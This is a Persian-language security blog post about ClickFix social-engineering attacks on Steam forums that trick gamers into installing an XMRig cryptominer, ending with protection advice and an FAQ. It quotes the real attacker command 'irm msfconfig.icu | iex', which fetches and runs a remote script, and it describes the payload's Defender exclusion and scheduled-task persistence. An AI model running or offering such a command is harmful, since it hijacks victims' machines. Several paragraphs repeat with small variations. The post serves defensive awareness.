امسال شاهد رونق واقعی حملات ClickFix بوده‌ایم. این حملات چنان مورد توجه مجرمان قرار گرفته که به سختی می‌توانیم در مورد یک نوع از آنها بنویسیم و بعد نوبت به نوع بعدی می‌رسد.

امسال شاهد افزایش واقعی حملات کلیک فیکس بودهایم. این روش چنان میان مجرمان محبوب شده که بهسختی درباره یک گونه از آن مینویسیم که نوبت به پوشش گونه بعدی میرسد.

این بار، مهاجمان گیمرها را هدف گرفتهاند: روزنامهنگاران فناوری پستهایی را مشاهده کردهاند که نکات مخرب را در فرومهای استیم تبلیغ میکنند. در ادامه توضیح میدهیم این پستها چه شکلی هستند، چه بدافزاری را گسترش میدهند و چگونه میتوانید دستگاه خود را ایمن نگه دارید.

کلیک فیکس راه خود را به فرومهای استیم باز میکند

بسیاری از گیمرها برای دریافت کمک و راهنمایی در مورد موضوعاتی مانند پشت سر گذاشتن کوئستهای دشوار، افزایش سطح، به دست آوردن بهترین لوتها یا دور زدن باگها، به همبازیهای خود در فرومهای استیم مراجعه میکنند. و دقیقاً همین اعتماد به توصیههای جامعه کاربران است که مهاجمان تصمیم به سوءاستفاده از آن گرفتهاند.

این عامل مخرب با پنهان کردن پست خود به عنوان توصیه عیب‌یابی، پیشنهاد می‌دهد که PowerShell را به عنوان مدیر اجرا کنید و دستوری را اجرا کنید که ظاهراً مشکل کاربر را برطرف می‌کند.

حمله زمانی آغاز میشود که مجرمان به سوال کسی درباره کرش کردن بازی، گم شدن آیتمهای اینونتوری یا سایر مشکلات فنی پاسخ میدهند. آنها با نقش بازی کردن به عنوان کاربران کمککننده، پیشنهاد میدهند که PowerShell را به عنوان Administrator باز کنید و دستوری را اجرا کنید که supposedly مشکل کاربر را حل میکند.

با پنهان کردن پست خود به عنوان راهنمای عیبیابی، مهاجم مخرب پیشنهاد میدهد PowerShell را به عنوان Administrator اجرا کرده و دستوری را اجرا کنید که supposedly مشکل کاربر را حل میکند.

همانطور که حدس میزنید، اجرای دستور هیچ چیزی را حل نمیکند – بلکه فقط یک دنیا مشکل جدید باز میکند. این کل ایده پشت ClickFix است: استفاده از مهندسی اجتماعی برای فریب قربانیان تا خودشان اقدامات ناامن را انجام دهند و به کلاهبرداران آنچه نیاز دارند برای نفوذ به دستگاه را بدهند. ما قبلاً درباره ترفندهای دیگر ClickFix نوشتهایم – CAPTCHAهای جعلی، خطاهای ساختگی مرورگر و موارد دیگر – که همگی بر این اصل استوارند که قربانی را وادار کنند دستور مخرب را خودشان اجرا کند.

زیرکی استفاده از ClickFix در فرومهای استیم این است که حمله ممکن است نه تنها بازیکنی که درخواست کمک کرده، بلکه بسیاری از گیمرهای دیگری که با همان مشکل مواجه میشوند و پاسخ را از طریق جستجوی گوگل پیدا میکنند نیز فریب دهد.

واقعاً پشت دستور irm | iex چیست

قبل از اینکه وارد جزئیات شویم که مهاجمان واقعاً گیمرها را وادار به نصب چه چیزی میکنند، باید مقداری پیشزمینه فنی را پوشش دهیم. بنابراین، ابتدا پستهای فروم استیم به کاربران ناآگاه پیشنهاد میدهند دستور زیر را در PowerShell اجرا کنند:

irm msfconfig.icu | iex

برای کسی که با PowerShell آشنایی عمیق ندارد، این خط ممکن است نسبتاً بیخطر به نظر برسد – شبیه راهاندازی MSConfig، ابزار پیکربندی سیستم داخلی ویندوز، با چند پارامتر اضافی است.

اما در واقعیت، اصلاً بیخطر نیست. بیایید بررسی کنیم هر بخش از این دستور واقعاً چه کاری انجام میدهد:

  1. irm مخفف دستور داخلی PowerShell به نام Invoke-RestMethod است. این دستور به آدرس وب مشخصشده در ادامه خط متصل شده و دادهها را در پاسخ دریافت میکند.
  2. icu آن آدرس وب است – نه نام یک فایل محلی همانطور که در نگاه اول ممکن است به نظر برسد. این سرور مهاجمان است و به درخواست irm با یک اسکریپت PowerShell مخرب پاسخ میدهد.
  3. iex دستور داخلی دیگر PowerShell به نام Invoke-Expression است. این دستور هر آنچه را که irm از آن آدرس وب دریافت میکند، به عنوان کد PowerShell اجرا میکند.

پس از اجرا، این خط کد PowerShell یک اسکریپت را از سایت مشخصشده دانلود کرده و بلافاصله آن را اجرا میکند. همانطور که یک کاربر ردیت بهدرستی اشاره کرده، میتوانید بهطور ایمن بفهمید چه کدی واقعاً روی دستگاه شما دانلود میشود – بدون خطر اجرای آن – فقط با حذف بخش دوم، یعنی iex. بدون آن، دستور صرفاً محتوای اسکریپت را دانلود کرده و در پنجره PowerShell چاپ میکند بدون اینکه آن را اجرا کند. این به شما کد کامل و پنهاننشدهای را میدهد که از شما خواسته شده روی دستگاه خود اجرا کنید. در ادامه، بررسی میکنیم این پستگذاران کمککننده فروم استیم واقعاً سعی دارند چه چیزی را روی ماشین گیمرها نصب کنند.

این اسکریپت جریانی از پیام‌ها را در مورد وظایف مختلف بهینه‌سازی جعلی نمایش می‌دهد تا وانمود کند که در حال انجام تعمیرات مفید است.

یک ماینر ارز دیجیتال، نه یک ابزار بهینهسازی

مهاجمان تحقیقات خود را انجام دادهاند: اسکریپت PowerShell دانلودشده از سرور آنها بهطور متقاعدکنندهای شبیه یک ابزار بهینهسازی ویندوز عمل میکند. پس از راهاندازی، مجموعهای از اعلانها را به کاربر نشان میدهد که ادعا میکنند فایلهای موقت را پاک میکنند، کش DNS را خالی میکنند، درایورها را بهروز میکنند، دیسک را برای خطا بررسی میکنند، برنامههای استارتآپ غیرضروری را غیرفعال میکنند، سیستم را برای بدافزار اسکن میکنند، ایمیج ویندوز را تعمیر میکنند و یکپارچگی فایلهای سیستمی را تأیید میکنند.

اسکریپت جریان پیامهایی درباره وظایف بهینهسازی جعلی مختلف را نمایش میدهد تا به نظر برسد در حال انجام نگهداری مفید است.

فعالیت واقعی، در همین حین، پشت صحنه اتفاق میافتد. اسکریپت با بررسی اینکه آیا با حقوق Administrator در حال اجرا است شروع میکند. اگر چنین باشد، یک پوشه کاری پنهان در C:\Windows\Background ایجاد میکند و آن را به لیست استثناهای Microsoft Defender اضافه میکند. از آن نقطه به بعد، هر فایلی که در آن پوشه قرار گیرد، توسط آنتیویروس داخلی ویندوز اسکن نمیشود.

سپس، اسکریپت سیستم را برای مرحله بعدی حمله آماده کرده و یک فایل اجرایی را از سرور مهاجمان دانلود میکند – و آن را در همان پوشه C:\Windows\Background با نام بهظاهر قانونی system.exe ذخیره میکند.

فایل دانلودشده XMRig است، یکی از محبوبترین ابزارها برای استخراج ارز دیجیتال Monero. XMRig خود بدافزار نیست؛ یک ابزار استخراج متنباز و قانونی است. مشکل این است که مهاجمان آن را بدون اطلاع قربانیان روی کامپیوترهای آنها نصب میکنند. پس از اجرا، قدرت پردازشی دستگاه برای استخراج Monero ربوده میشود و ارز دیجیتال حاصل مستقیماً به مجرمان میرسد.

این موضوع ریگهای گیمرها را به اهدافی بهویژه جذاب تبدیل میکند: PCهای گیمینگ مدرن دارای CPU و GPU قدرتمندی هستند – دقیقاً همان نوع سختافزاری که برای استخراج ارز دیجیتال عالی است.

برای اطمینان از اینکه بدافزار پس از ریبوت باقی میماند، اسکریپت یک وظیفه جدید در Windows Task Scheduler ایجاد میکند: XMRig-{نام کامپیوتر}. از آن پس، بهطور خودکار ماینر ارز دیجیتال را هر بار که سیستم راهاندازی میشود، اجرا میکند.

چگونه دستگاه خود را از ماینرهای ارز دیجیتال و سایر بدافزارها محافظت کنید

متأسفانه، بسیاری از گیمرها تمایلی به نصب نرمافزار امنیتی – یا فعال نگه داشتن آن – روی دستگاههای خود ندارند. عامل اصلی این باور غلط پایدار است که “آنتیویروس بازی شما را کند میکند”. ما قبلاً درباره تحقیقات در این مورد در وبلاگ خود نوشتهایم و نتایج نشان داد که اجرای آنتیویروس هنگام بازی هیچ افت عملکرد قابلتوجهی ایجاد نمیکند.

اما همین موضوع را نمیتوان درباره ماینرهای ارز دیجیتال گفت – آنها قطعاً به عملکرد آسیب میزنند و علاوه بر آن، سختافزار شما را سریعتر فرسوده میکنند. پس چه کاری میتوانید انجام دهید تا PC گیمینگ و حسابهای خود را از خطر دور نگه دارید؟

  • از اجرای اسکریپتهای PowerShell، Terminal یا سایر promptهای دستوری که غریبهها پیشنهاد میدهند کپی و اجرا کنید – چه در فرومها، چه در چتها یا نظرات – خودداری کنید.
  • قبل از زدن Enter روی هر دستوری که کاملاً متوجه آن نیستید، بررسی کنید چه کاری انجام میدهد و پیامدهای احتمالی اجرای آن چیست.
  • از یک راهحل امنیتی قابلاعتماد با حالت گیمینگ استفاده کنید که تلاشهای دانلود بدافزار را بهموقع شناسایی کرده و از اجرای آنها جلوگیری کند.
  • هنگام بازی محافظت را خاموش نکنید. استفاده از راهحلی با حالت گیمینگ اختصاصی راه درست است. محصولات امنیتی کسپرسکی بهطور خودکار آن حالت را بهمحض راهاندازی یک بازی فعال میکنند و بهروزرسانیهای پایگاه داده آنتیویروس، اعلانها و اسکنهای زمانبندیشده دیسک را تا پایان بازی به تعویق میاندازند.
Avatar
محمدجواد برجیان

مدیر فنی و متخصص ارشد امنیت سایبری با تمرکز بر طراحی، معماری و پیاده‌سازی راهکارهای امنیت اطلاعات در مقیاس سازمانی. دارای تجربه تخصصی در حوزه XDR، EDR، NDR، امنیت شبکه، Threat Detection & Response، TI و محصولات Kaspersky، همراه با سابقه مشاوره فنی، آموزش و اجرای پروژه‌های امنیتی در سازمان‌های اینترپرایز.

سوالات متداول

حملات ClickFix چیست و چگونه کاربران Steam را هدف قرار می‌دهد؟ +

در حملات ClickFix، مهاجمان کاربر را با یک پیام یا دستور جعلی متقاعد می‌کنند که برای رفع یک مشکل، خطا یا دریافت محتوای موردنظر، دستور خاصی را روی سیستم اجرا کند. در این مورد، مهاجمان از انجمن‌های Steam برای انتشار پست‌های مخرب و هدف قرار دادن گیمرها استفاده کرده‌اند.

آیا باز کردن پست‌های مخرب در انجمن‌های Steam باعث آلوده شدن سیستم می‌شود؟ +

صرف مشاهده یک پست لزوماً به معنی آلوده شدن سیستم نیست. خطر اصلی زمانی ایجاد می‌شود که کاربر به دستورها یا فایل‌های پیشنهادی مهاجم اعتماد کند و یک دستور، اسکریپت یا فایل ناشناس را اجرا کند. بنابراین نباید دستورهای نمایش‌داده‌شده در پست‌های مشکوک را در PowerShell، Command Prompt یا ابزارهای مشابه اجرا کرد.

چگونه می‌توان در برابر حملات ClickFix و بدافزارهای مرتبط با آن از سیستم محافظت کرد؟ +

برای کاهش خطر، سیستم‌عامل و نرم‌افزارهای امنیتی را به‌روز نگه دارید، از اجرای دستورهای ناشناس خودداری کنید و فایل‌ها یا لینک‌هایی را که از طریق انجمن‌ها و منابع غیرقابل‌اعتماد دریافت می‌کنید، اجرا نکنید. همچنین استفاده از یک راهکار امنیتی معتبر می‌تواند به شناسایی و مسدود کردن بدافزارهای مورد استفاده در این حملات کمک کند.

بدون دیدگاه
دیدگاه خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *